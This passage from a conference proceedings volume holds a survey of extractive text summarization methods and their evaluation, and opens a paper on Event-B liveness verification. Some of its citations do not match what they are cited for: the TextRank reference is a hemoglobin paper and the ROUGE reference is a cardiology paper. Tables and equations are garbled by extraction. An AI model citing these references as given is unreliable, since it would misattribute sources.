23. Tawhid, M. A., & Ibrahim, A. M. (2020). Hybrid binary particle swarm optimization and flower
pollination algorithm based on rough set approach for feature selection problem. In Nature-
inspired computation in data mining and machine learning, (pp. 249–273).
Automatic Extractive Summarization
for English Text: A Brief Survey

Sunil Dhankhar and Mukesh Kumar Gupta

Abstract In recent years, due to the popularity of the Internet, digital documents are
growing at an exponential rate on the Web. To save time and quickly know about the
document(s), a text summary system is required because the manual text summary
takes time, effort, and cost, that produces a summary automatically from the source
document(s). A summary contains key phrases and other related essential text mate-
rial with no alteration of the key information and the general context of the source
document(s). The text summary process began in the 1958 s, and researchers continue
to try and improve the summary of texts. The process of summary is either extrac-
tive or abstractive. The extractive text summarization extracts the most appropriate
sentences, phrases, or word from the text/document(s), then incorporates them in the
summary while the abstractive text summarization system results in a summary of
phrases other than the from the input text/document(s). This review paper describes
preprocessing, features, methods, evaluations, and future directions in the extractive
text summarization research. This study describes the advantages and shortcomings
of each method and compares them using precision, recall, and F-score and finds
that deep learning-based methods produce excellent results when adequate training
summaries are available.

Keywords Text summarization · Extractive summarization · Abstractive


summarization · Precision · Recall · F-score · Deep learning

1 Introduction

In today’s world, Internet users are increasing exponentially day by day. So large
amounts of information and documents, in digital form, are available online. It is
not an easy job to quickly and summarily find the corresponding information and

S. Dhankhar (B) · M. K. Gupta


Department of Computer Science and Engineering, Swami Keshvanad Institute of Technology,
Management & Gramothan, Jaipur 302017, India
e-mail: sunil@skit.ac.in

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 183
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_15
184 S. Dhankhar and M. K. Gupta

Fig. 1 Categorization
factors of text summarization

documents according to users’ interests. However, manual summaries of such larger


documents on time are a very complex and time-consuming task. Automatic text
summarization is a mechanism that produces summaries of larger documents in less
time.
The research on the text summarization has been started in1958 s. [1] successfully
generate the abstract, using word frequency statistical method, of technical papers
and magazine articles. Since then, researchers used different techniques to produce a
summary from the text documents to represent the whole document [2, 3]. According
to [4], a summary is a short text created by one or more texts that include a substantial
part of the source text(s) that is not more than half of the original text(s).
Automatic text summarization is the way of creating a concise and coherent
summary while preserving the central and overall sense of the source text(s) [2].
According to [5], there are various factors that are used to categorize the automatic
text summarization process that is input, purpose, and output (see Fig. 1). The
input factor further can be classified as a single document, multidocument, monolin-
gual, multilingual, and cross-lingual. In the single document, only one document is
used as input to produce a summary while, on the other hand, in the multidocument,
more than one document is used as input to produce a summary. These multiple
input documents are often from the same theme. The monolingual automatic text
Automatic Extractive Summarization for English Text … 185

summarization system generates summaries in the same language as the input lan-
guages while multilingual systems use different language document(s) and generate
the summaries in one of input document(s) languages. The cross-lingual systems,
the input document(s) language, and summary language are not the same.
A summary may be categorized as generic, domain-specific, and query-based
according to the purpose factor. Generic summary do not concern any class, subject,
or domain. This is for general use containing all the information present in the docu-
ments, while the domain summaries refer to a particular area of interest. In contrast,
query-based systems produce the summaries on the basis of a user query. Based
on the output factor, text summarization can be classified as extractive and abstrac-
tive. Extractive summaries are produced by selecting important words, phrases, and
sentences from the source document(s) while abstractive summaries are human-like
summaries that contain words, phrases, and sentences not featured in the source
document(s). In other words, advanced natural language processing techniques are
required to generate abstractive summaries [6].
The extractive summaries are easier to generate because the source document(s)
ensure the baseline levels of grammatically and accuracy. On the other hand, abstrac-
tive summaries are hard to generate because it requires paraphrasing, generalization,
and the real-world knowledge. This paper focuses on features, techniques and meth-
ods, and evaluation of extractive text summarization.
The paper is arranged as follows: Sect. 2 describes extractive summarization.
Section 3 illustrates the various features of text summarization systems. Section 4
describes the different methods proposed in the literature for extractive text summa-
rization. Section 5 compares the different methods that we have presented in Sect. 4.
Section 6 introduces the various performance matrices for evaluating methods for
extractive text summarization, and Sect. 7 concludes the paper and presents future
guidance for the study into extractive text summarization research.

2 Extractive Text Summarization

As previously mentioned, extractive summary techniques generate summaries by


selecting a subphrase from a text(s). The summary produced includes the most sig-
nificant phrases from a single or multiple documents. Figure 2 shows the steps of
extractive summarization that are preprocessing, processing, and post-processing. In
the preprocessing step, unstructured data is changed into the structured data using
segmentation, stopword removal, stemming, lemmatization, and tokenization. The
second step consists of a representation of text, scoring of sentences, and extraction
of highest scored sentences. Sections 3 and 4 define different features, methods, and
techniques that are used for the text processing, and in the last step, the summary
is generated by reordering the sentences and replacing the words with their actual
values.
186 S. Dhankhar and M. K. Gupta

Fig. 2 Steps in extractive text summarization process

3 Features for Extractive Text Summarization

Features can be categorized as word and sentence level [7]. Word-level features
score each word and sentence-level features are used to score each sentence and then
high score sentences extracted to produce a summary [8]. Table 1 contains different
features that are used by researchers in recent time.

4 Methods for Extractive Text Summarization

This section addresses the different techniques and methods of extractive text sum-
marization used periodically by different researchers to increase the quality of the
summary. We described and briefly illustrated each of these methods in the rest of
this section.

4.1 Statistical-Based

This method uses some statistical techniques to identify important sentences or words
in a document(s). These techniques assign the weights to sentences or words without
considering the meaning or relation of sentences or words. Some statistical techniques
are word probability [1, 9], TF-IDF [7, 10, 11], title word [12, 13], proper-noun
[12, 13], thematic word [12], keywords [13, 14], numerical data [12, 13], sentence
position [7, 12], and sentence length [7, 12].
Automatic Extractive Summarization for English Text … 187

Table 1 Feature classification


Features Classification Description
Word probability [1, 9] Word-Level Each word occurring in the document(s) is
counted. A word’s probability can be defined as
the number of counts divided by all the words in
the document(s).
TF-IDF [7, 10, 11] Word-level The significance of the word is determined by
multiplying its TF and IDF values of that word.
Title-word [12, 13] Word-level Sentences containing the title words are more
important to other sentences because that
sentence reflects the document theme and is
considered to be the most important in a
summary.
Proper-Noun [12, 13] Word-level Sentences with proper names such as a person’s
name, location, and idea are highly likely to be
part of the summary.
Thematic word [12] Word-level Thematic words are a list of the most important
domain keywords in the document(s). The
summary should include a sentence with a
maximum number of such words.
Content word [13, 14] Word-level Keywords are generally nouns and identified by
TF-IDF.
Numerical data [12, 13] Word-level Sentences with numerical details are considered
relevant and should be summarized.
Sentence position [7, 12] Sentence-level A sentence’s location is an important element in
assessing the value of the sentence. The initial
sentences in records are always important and
can be outlined instead of the last sentences.
Sentence length [7, 12] Sentence-level Long sentences contain more and relevant
information as compared to the short sentences.
So short sentences are ignored.

The biggest disadvantage of this method is that it may generate a low-quality


summary because it does not consider the meaning of sentences or words.

4.2 Graph-Based

The graphical sentencing methods were one of the most critical approaches which
have attracted the attention of many researchers in this area. Words or phrases are
shown in graphs as nodes and edges that combine the words and sentences of semantic
relation. Two essential techniques on a graph that provide promising results for the
ranking of phrases are TextRank [15] and LexRank [16]. Both documents define the
sentences and set them vertically in a weighted unlinked graph, then draw the edges
188 S. Dhankhar and M. K. Gupta

between the sentence pairs based on the relation of similarity between them. Using
the PageRank [17] algorithm on the graph, significant terms are chosen by the system
using a random walk on the graph.
GRAPHSUM, the new general purpose summarizer on the basis of a graphic
model, reveals multiwords similarities by looking at the rules of association [18].
Alzuhair and Al-Dhelaan [19] developed an improved weighting scheme by com-
bining several key steps to determine the similitude of two sentences by Jaccard
coefficient of similarity, TF*IDF, cosine and Topic signatures similarity, and then
use PageRank algorithm to the identity similarity measure.

4.3 Semantic-Based

Semantic-based methods identify the relationship between sentences and words by


latent semantic analysis (LSA) technique. LSA is a method that derives semantics
dependent on words observed [20]. Gong and Liu [21] defines the LSA technique to
select highly ranked sentences from document(s) as follows.
First construct S = [s1 , s2 , . . . sn ] matrix of phrases, which represents the weighted
term-frequency vector of the sentence in the text. If the document contains a total of
m words and n phrases, the document contains m x n matrix S. Since not all terms
normally appear in any expression, the matrix S is typically sparse. Provided the
m × n matrix S where the single value decomposition (SVD) of S without loss of
generality is defined as:
S = U EV T (1)
 
where U = u i, j is an m × n column-orthogonal matrix with columns known as
left singular vectors; E is the n × n diagonal
 matrix with non-negative singular
values sorted in descending order, and V = vi, j is an n × n orthogonal matrix with
columns are called vectors.
John et al. [22] proposed automated multidocument summary approach for extrac-
tive feature-based automatic extractive methods, considering semantic aspects with
techniques LSA and non-negative matrix factorization (NMF). The sentence rating
steps for any LSA summary can be divided into two parts: First, construct the word-
to-phrase matrix for the input, and second, use SVD technique on the input matrix
for determining the correlation between terms and phrases [23]. The key downside
of the semántic approach used by the LSA technique is that the connection between
the combinations of several documents and the basic concepts is not considered
[24]. To overcome this drawback, [24] proposed the Enhanced LSA (ELSA)-based
summarizer for the multi documents by correlating recurrent sets of words with the
underlying document concepts.
Automatic Extractive Summarization for English Text … 189

4.4 Fuzzy-Based

Fuzzy logic is a multiple-valued logic that is characterized by a membership func-


tion and an extension of Boolean logic, which was introduced for describing the
intermediate values between two discrete values like 1 and 0. Fuzzy’s advantage is
consistency in the real world, which is not a world of two values [25]. Khosravi et al.
[26] used a fuzzy logic system with multiple features to produce a summary. Esther
Hannah and Geetha [27] successfully generates summary using fuzzy inference sys-
tem with different features that we have discussed in Sect. 3. Malallah and Ali [28]
proposed ATS for multidocuments that use linguistic and statistical features of sen-
tences. The extracted features are feed-in fuzzy logic system and then the apriori
algorithm is used for association rule extraction.
The latest research using fuzzy logic that automatically produced summaries from
Goularte [29] that relies on fuzzy rules to locate the most relevant information in the
texts analyzed. This method summarizes the text by the study of the relevant features
to decrease dimensionality. This method will also benefit the development and use
of potential structures of experts to automatically test writing, with the proposed text
summary technique with relatively few fuzzy rules.
The most recent research using fuzzy-based methods is done by [7]. There are
four main components in fuzzy logic system. The first component is fuzzifier that
uses membership function to translate features into linguistic values, fuzzy inference
engine is the second component that carries out the formulation of outputs based
on membership function and fuzzy rules, thirdly, human intelligence is employed in
designing the rules of if-then and lastly, defuzzification which returns the linguistic
inference results to a narrow output. Van Lierde et al. [30] recommended the new
query-oriented summarization system with a fuzzy hypergraph model where nodes
represent sentences and topics are represented by fuzzy hyperedges. In this method,
phrases are evaluated by their significance to the query and their central role in the
hypergraph.

4.5 Machine Learning-Based

With these methods, the problem of summary is a supervised sentenced classification


problem with a set of documents and their related summaries [31]. Each document’s
sentences shall be modeled as vectors for text-derived functions. During a training
cycle, the computer learns from examples, that every sentence of the test paper
is labeled “summary” or “non summary”. The unseen documents are sent to the
trained model after a successful learning phase, which provides a chance to describe
summary statements.
Conroy and O’leary [32] successfully generated sentence abstract summaries of
documents using hidden Markov models (HMM). [31] used Naive Bayes and C4.5
decision tree algorithms for the classification task. Shen et al. [33] suggested a novel
190 S. Dhankhar and M. K. Gupta

document summary method based on the conditional random field (CRF) where
the problem of the summary is described as a problem of sequence labeling. Apply
support vector regression (SVR) to the query-centric multidocument with a number of
specified features to locate the related sentences in the document to be summarized
[34]. Fattah [35] proposed a multidocument hybrid machine learning model with
maximum entropy (ME), Naive Bayes, and support vector machine (SVM). The
SVM classifier aims to find optimum hyperplane between the classes “Summary”
and “Non-Summary” with its core feature in the SVM classifier. It is defined in Eq. 2:

K (xi , x j ) = tanh(γ · xiT x j + r ) (2)

where γ and r are the kernel parameters set to γ = 1.


The latest research using machine learning methods is done by [36] that proposed
a novel multidocument summary extraction approach consisting of a two-stage pro-
cedure to complete the task of summarization. The first step is to construct a single
document from several documents with the help of coverage and non-redundancy
features. In the second step, the problem with the text summary treated as a prob-
lem with optimization in which the summary phrases are used to record phrases of
optimized functions.
The most recent study using methods for machine learning is conducted using the
K-means clustering with the TF-IDF to produce the summary [37]. The K-means
clustering is a non-supervised algorithm for machine learning that classifies the
weighted N number of sentences from a text to k-clusters using TF-IDF techniques
while the value of k is user-defined.

4.6 Deep Learning-Based

Methods based on the neural network (NN) have recently become popular for extrac-
tive summarization. Deep neural networks are a model and processing of information
with several nonlinear neural network layers. Deep learning networks must have a
huge amount of training data for powerful representation and usable semantically
data, for example, the convolutional neural network (CNN) and recurrent neural net-
works (RNN); most deep learning approaches need labeled data for buildings with
millions of learning parameter in deep neural architecture.
Kågebäck et al. [38] uses continuous vector representations to represent sentences
of multidocument for extractive summarization. Continuous vectors are based on
recursive autoencoder on a standard dataset using the ROUGE evaluation measures.
Kim [39] trains simple CNN with one convolution layer on top of word vectors from
an unsupervised neural language model [40] applied CNN to represent the sentences
in continuous vector space, then selects sentences from the multidocument, by min-
imizing the cost based on the “prestige” and “diversity”. Zhong et al. [41] another
related research to solve the query-oriented multidocument summary problem by
using an unsupervised deep learning model called query-oriented deep extraction
(QODE). The QODE model has three elements: extraction, generation of the sum-
Automatic Extractive Summarization for English Text … 191

mary, and validation of the reconstruction. Finally, the most appropriate sentences
are selected using dynamic programming to create a summary.
Cheng and Lapata [43] develops a deep neural network-based hierarchical docu-
ment encoder and an attention-based content extractor for single document extractive
summarization. Sentence representations are obtained by using a single-layer CNN
with a max-overtime pooling operation that is then used as inputs to a standard
RNN that acquires document-level representations hierarchically. The highest score
sentences are selected using a long short-term memory (LSTM) decoder.
Yousefi-azar and Hamey [44] implemented an unsupervised deep neural network
that produces summary for single document based on a query. Using the deep autoen-
coder (AE), they have been able to learn the features from the term frequency and to
apply small random noise to the local terms frequency as a representation of AE input
and suggest such a noisy AE ensemble, the Ensemble Noisy Auto-Encoder (ENAE),
increasing average recall 11.2%. Nallapati et al. [45] presents SummaRuNNer that
is an extractive text summary two-layer two-way GRU-RNN sequence model for
sequential classification, where every sentence is visited sequentially in the original
order, and a judgment is made as to whether or not to be used in the description.
Yao et al. [46] presents a framework for extractive document reinforcement learn-
ing using the hierarchical CNN/RNN network architecture not only for generating
detailed functionality, but also for creating a collection of likely Deep Q-Network
(DQN) text behavior. At the same time, DQN discovers what sentence will be picked
in an approximation of the Q-value function based on content, salience, and redun-
dancy.
The latest research using deep learning methods is done by [42] that proposed
SummCoder for a generalized extractive text summarization system of unsupervised
deep learning for a single document. The sentence value is based on the importance of
the sentence information, the sentence novelty, and the sentence location in the doc-
ument. The summary result is obtained by choosing the top-score phrases restricted
by the default summary length.
The most recent research using deep learning-based methods is done by [47] that
proposed two approaches based on NN for the summarization task for Indian legal
judgment documents. In the first solution, a single unit which is a feed-forward NN
(FFNN) is made of an input layer, two hidden layers, and one output layer. The
architecture of the NN is shown in Fig. 3 and the second approach uses a recursive
LSTM-based NN that contains memory blocks known as LSTM cells, and one LSTM
cell consists of four interacting layers of the neural network.

5 Comparison of Methods for Extractive Text


Summarization

This section compares various extractive text summary approaches mentioned in


the above section. We compare them based on co-selection evaluation performance
matrices that are precision, recall, F-score. Table 2 provides a detailed comparison
and also illustrates the advantages and limitations of these methods.
192 S. Dhankhar and M. K. Gupta

Fig. 3 FFNN architecture [42]

6 Evaluation Matrices

The evaluation of automatically generated summary for a document(s) is a very dif-


ficult task because evaluation criteria, for a quality summary, are not defined clearly.
Since the late1990 s, many evaluation conferences have been started in the USA [5].
Some of them are “SUMMAC (1996–1998)” [48], “The Document Understanding
Conference (DUC, 2000–2007)” [49] and most recently, The Text Analysis Con-
ference (TAC, 2008-at present). The primary purpose of these conferences was to
encourage state-of-the-art summary techniques of text by evaluation results. The
present performance criteria are classified as extrinsic and intrinsic evaluation [50].
Extrinsic assessment tests the consistency of the automatic summary depending on
how this helps other activities such as text classification, information collection, or
question reply.

6.1 Intrinsic Evaluation

Two types of evaluation metrics are used based on text quality and content evaluation.
In the text quality evaluation, the main parameters to measure the quality of text
are: it must be grammatically correct, no repetition of sentences (non-redundancy),
reference clarity, and a summary must contain coherent sentences and have some
structure.
Table 2 Comparison and evaluation of different methods(“-” means not defined)
Method name Advantages Limitations Reference No. Precision Recall F-score
Statistical-based Easy to implement Lack of uniformity in [1, 9–11] – – –
summary and important
sentences may not be
included in summary.
Graph-based It offers a greater Sentences in graphs are [16] – 0.087 –
interpretation of critical indicated by bag of
sentences words that use similarity
measures that cannot
recognize semantically
identical sentences
[18] 0.099 0.093 0.097
[19] – – –
Semantic-based Semantically-related This approach uses [22] 0.554 0.542 0.548
sentences will be time-consuming SVD
generated by this method methodology, and the
summary generated
depends on the
consistency of the
Automatic Extractive Summarization for English Text …

semantic representation
of the source text
[23] – 0.05 –
[24] – 0.86 –
Fuzzy-Based A fuzzy method is This method can be an [27] 0.4734 0.4918 0.4824
similar to the issue of real issue of repetition in the
world that is not a world summary of the chosen
of two values (0 or 1) sentences, and it affects
summary accuracy. A
redundancy reduction
technique is therefore
required to enhance the
accuracy of final
summary
193

(continued)
Table 2 (continued)
194

Method name Advantages Limitations Reference No. Precision Recall F-score


[7] 0.073 0.155 0.099
[28] 0.473 0.463 0.466
[29] 0.366 0.496 0.421
Machine learning-based A basic machine-based This requires an [33] – 0.419 –
learning approach can extensive training
yield better results than collection of extractive
other methods summaries that are
manually generated and
mark each sentence as
either a “Summary” or a
“non-summary”
sentence.
[32] – 0.535 –
[34] – 0.0757 –
[35] – 0.382 –
[36] 0.234 0.096 0.136
Deep Learning-Based The model based on deep This approach uses [38] 0.199 0.204 0.194
learning can be learned in neural networks, which
the manner of the reader are slow during training
and testing, and it is
difficult to define how the
network makes a decision
[41] – 0.092 –
[40] – 0.269 0.107
[45] – 0.231 –
[43] – 0.83 –
[44] 0.167 0.229 0.188
[46] – 0.141 –
[42] – 0.717 –
[47] 0.217 0.283 0.245
S. Dhankhar and M. K. Gupta
Automatic Extractive Summarization for English Text … 195

6.2 Content Evaluation

Intrinsic evaluations are further classified into two categories according to content
evaluation: co-selection and content-based evaluation. Recall, precision, and F-score
are used in the matrices for co-selection [51]. Let S A represent the number of sen-
tences in an automated summary, while SG represents a total number of gold sum-
mary sentences. Precision(P), recall(R), and F-score(F) can be expressed in the
following equations:
S ∩S
P= A G (3)
SA
S A ∩SG
R= (4)
SG

2∗ P ∗ R
F= (5)
P+R

The biggest issue with precision and recall is the very different evaluation of
two perfectly strong automated generation summaries. Saggion et al. [52] proposed
cosine similarity, unit-overlap that is based on unigram or bi-gram and longest com-
mon subsequence (LCS) of content-based evolution methods comparing similarities
among summaries. The biggest disadvantage of these methods is how the results are
correlated with human judgment.
“Recall-Oriented Understanding for Gisting Evaluation (ROUGE)” [51] is also
a content-based evaluation method uses n-gram matching to automatically evaluate
system-generated summaries with human-generated summaries. ROUGE contains
many packages to evaluate system-generated summary but here we are discussing
only those which are commonly used by the researchers:
• ROUGE-N: In this case, N refers to the N-gram length. It is a recall-oriented
measure based on N-grams (mostly bi-gram and tri-gram) comparison. To cal-
culate the score, we take N consecutive words from the system-generated and
gold summaries and then find the total matching words between them and lastly,
divide the N-grams from the gold summary. The drawback of this strategy is that
N consecutive words are required for the match.
• ROUGE-L: L stands for LCS. Unlike ROUGE-N, it automatically identifies the
longest in-sequence word matching, at the sentence level, between the system-
generated and the gold summaries. The final score is calculated to sum all the sen-
tence level LCS. The longer LCS of two summaries, the more similarity between
these two summaries. There are two advantages of this measure: (1) It does not
require consecutive word matches. (2) No predefined length of N-gram is required.
The disadvantage of this measure is that it does not consider the short sequences
in the final score.
• ROUGE-SU: SU stands for skip bi-gram and unigram. It consists of skip bi-gram
between two words with arbitrary distance in the sentence order. If the distance is
196 S. Dhankhar and M. K. Gupta

very large then it produces misleading bi-gram matching. Therefore, the maximum
skip distance of 4, i.e., ROUGE-SU4.
The biggest disadvantage of ROUGE evaluation methods is that the people may
disagree on gold summaries because these summaries may be biased. However,
ROUGE is widely used by the researchers for the evaluation purpose of automatically
generated summaries.

7 Conclusion

The Summarization of the text is an important research subject for researchers since
the manual text is time-intensive and costly because of the vast volume of text on
the Internet. We concentrate on the extractive summaries because it does not require
much linguistic knowledge and then we have listed different features used by the
different researchers in recent time. The most used features are sentence position,
sentence length, and TF-IDF feature. By comparing different methods of text sum-
marization, we concluded that deep learning methods outperform if enough training
data are available. Future research in text summarization includes improving widely
used features and finding the features which are compatible and adding accurate
grammatical summaries.

References

1. Lunh, H. P. (1958). The automatic creation of literature abstracts. IBM Journal of Research
Development, 2(2), 159–165.
2. Allahyari, M., Pouriyeh, S., Assefi,M., Safaei, S., Elizabeth, D., Juan, B., & Kochut, K. (2017).
Text summarization techniques: A brief survey. International Journal of Advanced Computer
Science and Applications, 8(10).
3. Yogan J. K., Goh, O. S., Basiron, H., Choon, N. K., & Suppiah, P. C. (2016). A review on
automatic text summarization approaches. Journal of Computer Science, 12(4), 178–190.
4. Magdum, P. G., & Rathi, S. (2021). A survey on deep learning-based automatic text summa-
rization models. In Advances in Artificial Intelligence and Data Engineering (pp. 377–392).
Springer.
5. Saggion, H., & Poibeau, T. (2013). Automatic text summarization: Past, present and future. In
Multi-source, multilingual information extraction and summarization (pp. 3–21). Springer.
6. See, A., Liu, P. J., & Manning, C. D. (2017). Get to the point: Summarization with pointer-
generator networks. arXiv preprint arXiv:1704.04368.
7. Patel, D., Shah, S., & Chhinkaniwala, H. (2019). Fuzzy logic based multi document summa-
rization with improved sentence scoring and redundancy removal technique. Expert Systems
with Applications, 134, 167–177.
8. Wang, S., Zhao, X., Li, B., Ge, B., & Tang, D. (2017). Integrating extractive and abstrac-
tive models for long text summarization. In 2017 IEEE International Congress on Big Data
(BigData Congress) (pp. 305–312). IEEE.
9. Vanderwende, L., Suzuki, H., Brockett, C., & Nenkova, A. (2007). Beyond SumBasic: Task-
focused summarization with sentence simplification and lexical expansion. Information Pro-
cessing and Management, 43(6), 1606–1618.
Automatic Extractive Summarization for English Text … 197

10. Güran, A., Uysal, M., Ekinci, Y., & Güran, C. B. (2017). An additive FAHP based sentence
score function for text summarization. Information Technology and Control, 46(1), 53–69.
11. Mori, H., Yamanishi, R., & Nishihara, Y. (2018). Detection of words accepted to dynamic
abstracts focusing on local variation of word frequency. Procedia Computer Science, 126,
1442–1449.
12. Abbasi-ghalehtaki, R., Khotanlou, H., & Esmaeilpour, M. (2016). Fuzzy evolutionary cellular
learning automata model for text summarization. Swarm and Evolutionary Computation, 30,
11–26.
13. Gambhir, M., & Gupta, V. (2017). Recent automatic text summarization techniques: A survey.
Artificial Intelligence Review, 47(1), 1–66.
14. Gupta, V., & Kaur, N. (2016). A novel hybrid text summarization system for Punjabi text.
Cognitive Computation, 8(2), 261–277.
15. Taketa, F. (1973). Structure of the felidae hemoglobins and response to 2, 3-diphosphoglycerate.
Comparative Biochemistry and Physiology Part B: Comparative Biochemistry, 45(4), 813–823.
16. Radev, D. R., & Erkan, G. (2004). LexRank : Graph-based centrality as salience in text sum-
marization. Journal of Artificial Intelligence Research, 22(1), 457–479.
17. Brin, S., & Page, L. (1998). The anatomy of a large-scale hypertextual Web search engine
BT—Computer networks and ISDN systems. Computer Networks and ISDN Systems, 30(1–
7), 107–117.
18. Baralis, E., Cagliero, L., Mahoto, N., & Fiori, A. (2013). GraphSum: Discovering correlations
among multiple terms for graph-based summarization. Information Sciences, 249, 96–109.
19. Alzuhair, A., & Al-Dhelaan, M. (2019). An approach for combining multiple weighting
schemes and ranking methods in graph-based multi-document summarization. IEEE Access,
7, 120375–120386.
20. Deerwester, S., Harshman, R., Susan, T., George, W., & Thomas, K. (1990). Indexing by latent
semantic analysis. Journal Of THe American Society For Information Science, 41(6), 391–407.
21. Gong, Y., & Liu, X. (2001). Generic text summarization using relevance measure and latent
semantic analysis. In Proceedings of the 24th annual international ACM SIGIR conference on
research and development in IR (pp. 19–25).
22. John, A., Premjith, P. S., & Wilscy, M. (2017). Extractive multi-document summarization using
population-based multicriteria optimization. Expert Systems with Applications, 86, 385–397.
23. Al-Sabahi, K., Zhang, Z., Long, J., & Alwesabi, K. (2018). An enhanced latent semantic analy-
sis approach for Arabic document summarization. Arabian Journal for Science and Engineer-
ing, 43(12), 8079–8094.
24. Cagliero, L., Garza, P., & Baralis, E. (2019). ELSA: A multilingual document summariza-
tion algorithm based on frequent itemsets and latent semantic analysis. ACM Transactions on
Information Systems, 37(2), 1–33.
25. Zadeh, L. A. (1965). Fuzzy sets. Information and Control, 8(3), 338–353.
26. Khosravi,H., Eslami, E., Kyoomarsi, F., & Dehkordy, P. K. (2008). Optimizing text summa-
rization based on fuzzy logic. In Computer and Information Science (pp. 121–130). Springer.
27. Esther Hannah, M., & Geetha. (2011). Automatic extractive text summarization based on fuzzy
logic: A sentence oriented approach. In International Conference on Swarm, Evolutionary, and
Memetic Computing (pp. 530–538). Springer.
28. Malallah, S., & Ali, Z. H. (2017). Multi-document text summarization using fuzzy logic and
association rule mining. IASJ, 41, 241–258.
29. Goularte, F. B., Nassar, S. M., Fileto, R., & Saggion, H. (2019). A text summarization method
based on fuzzy rules and applicable to automated assessment. Expert Systems with Applications,
115, 264–275.
30. Van Lierde, Hadrien, & Chow, Tommy. (2019). Learning with fuzzy hypergraphs: A topical
approach to query-oriented text summarization. Inf. Sci., 496, 212–224.
31. Neto, J. L., Freitas, A. A., & Kaestner, C. A. A. (2002). Automatic text summarization using
a machine learning approach. In Brazilian symposium on artificial intelligence (pp. 205–215).
Springer.
198 S. Dhankhar and M. K. Gupta

32. Conroy, J. M., & O’leary, D. P. (2001). Text summarization via hidden markov models. In Pro-
ceedings of the 24th annual international ACM SIGIR conference on research and development
in information retrieval (pp. 406–407).
33. Shen, D., Sun, J.-T., Li, H., Yang, Q., & Chen, Z. (2004). Document summarization using
conditional random fields (pp. 2862–2867).
34. Ouyang, Y., Li, W., Li, S., & Qin, L. (2011). Applying regression models to query-focused
multi-document summarization. Information Processing and Management, 47(2), 227–237.
35. Fattah, M. A. (2014). A hybrid machine learning model for multi-document summarization.
Applied Intelligence, 40(4), 592–600.
36. Verma, P., & Om, H. (2019). MCRMR : Maximum coverage and relevancy with minimal
redundancy based multi-document summarization. Expert Systems With Applications, 120,
43–56.
37. Khan, R., Qian, Y., & Naeem, S. (2019). Extractive based text summarization using k-means
and tf-idf. International Journal of Information Engineering & Electronic Business, 11(3),
38. Kågebäck, M., Mogren, O., Tahmasebi, N., & Dubhashi, D. (2014). Extractive summarization
using continuous vector space models. In Proceedings of the 2nd Workshop on CVSC (pp.
31–39).
39. Kim, Y. (2011). Convolutional Neural Networks for Sentence Classification.
40. Yin, W., & Pei, Y. (2015). Optimizing sentence modeling and selection for document summa-
rization. Ijcai, 1383–1389, 2015.
41. Zhong, S., Liu, Y., Li, B., & Long, J. (2015). Query-oriented unsupervised multi-document
summarization via deep learning model. Expert Systems With Applications, 42(21), 8146–8155.
42. Joshi, A., Fidalgo, E., Alegre, E., Fernández-robles, L. (2019). SummCoder : An unsupervised
framework for extractive text summarization based on deep auto-encoders. Expert Systems
With Applications, 129, 200–215.
43. Cheng, J., & Lapata, M. (2016). Neural summarization by extracting sentences and words (pp.
484–494).
44. Yousefi-azar, M., & Hamey, L. (2017). Text summarization using unsupervised deep learning.
Expert Systems With Applications, 68, 93–105.
45. Nallapati, R., Zhai, F., & Zhou, B. (2017). Summarunner: A recurrent neural network based
sequence model for extractive summarization of documents. In Proceedings of the AAAI Con-
ference on Artificial Intelligence (Vol. 31).
46. Yao, K., Zhang, L., Luo, T., & Yanjun, W. (2018). Neurocomputing deep reinforcement learning
for extractive document summarization. Neurocomputing, 284, 52–62.
47. Anand, D., & Wagh, R. (2019). Effective deep learning approaches for summarization of legal
texts. Journal of King Saud University-Computer and Information Sciences.
48. Mani, I., House, D., Firmin, T., & Sundheim, B. (2002). Summac: A text summarization
evaluation. Natural Language Engineering, 8(1), 43–68.
49. Over, P., Dang, H., & Harman, D. (2007). DUC in context. Information Processing and Man-
agement, 43(6), 1506–1520.
50. Jones, K. S. (1998). Automatic summarising: Factors and directions (pp. 1–21).
51. Tsuchiya, G. (1971). Postmortem angiographic studies on the intercoronary arterial anasto-
moses: Report I. Studies on intercoronary arterial anastomoses in adult human hearts and
the influence on the anastomoses of structures of the coronary arteries. Japanese Circulation
Journal, 34(12), 1213–1220.
52. Saggion, H., Radev, D., Teufel, S., & Lam, W. (2002). Meta-evaluation of summaries in a cross-
lingual environment using content-based metrics. In COLING 2002: The 19th International
Conference on Computational Linguistics.
Formal Verification of Liveness
Properties in Causal Order Broadcast
Systems Using Event-B

Pooja Yadav, Raghuraj Suryavanshi, and Divakar Yadav

Abstract Distributed systems have complex designs which are difficult to under-
stand and verify. A rigorous specification of such systems using mathematical tech-
niques such as formal methods is required to understand their precise behavior. Safety
property implies that the system is free from deadlocks and safe with respect to the
invariants, while the liveness property ensures that the system eventually makes
progress. Various group communication protocols are one of the building blocks of
reliable distributed systems applications. One of the message ordering protocols is the
causal order broadcast in which message delivery at various processes takes places
as per causal order. This paper presents how the liveness properties are preserved
by message passing in causal order using Event-B. An incremental model for causal
order-based message passing is constructed using Event-B specification. The prop-
erties of causal order broadcast are first specified using an abstract model, and then,
details are added with each refinement step. Liveness property is ascertained by
ensuring enabledness preservation and non-divergence among various refinements
and is expressed as invariants in the model of causal order broadcast system.

Keywords Formal methods · Causal order · Event-B · Liveness properties ·


Enabled preservation property · Non-divergence property

P. Yadav (B)
Dr. A.P.J. Abdul, Kalam Technical University, Lucknow 226021, India
e-mail: poojayadav255@gmail.com
R. Suryavanshi
Pranveer Singh Institute of Technology, Kanpur 209305, India
e-mail: raghuraj.suryavanshi@gmail.com
D. Yadav
Institute of Engineering and Technology, Lucknow 226021, India
e-mail: dsyadav@ietlucknow.ac.in

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 199
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_16
200 P. Yadav et al.

1 Introduction

Two important properties in the specification of distributed systems protocols and


models are safety and liveness. The distinction between liveness and safety proper-
ties and various tools and techniques to verify them are discussed in [1]. Liveness
property indicates that eventually something positive will occur, and safety property
as described in [2] indicates that something negative will not occur during system
execution. In this paper, we demonstrate the preservation of liveness property in
causal ordered message-passing systems using enabledness preservation and non-
divergence. Event-B [3] is used for rigorous mathematical specification and designing
of models of distributed systems step by step leading from abstract model to further
refinements and then verifying the correctness of the system through discharge of
proof obligations. The guards of each event are strengthened with every refinement
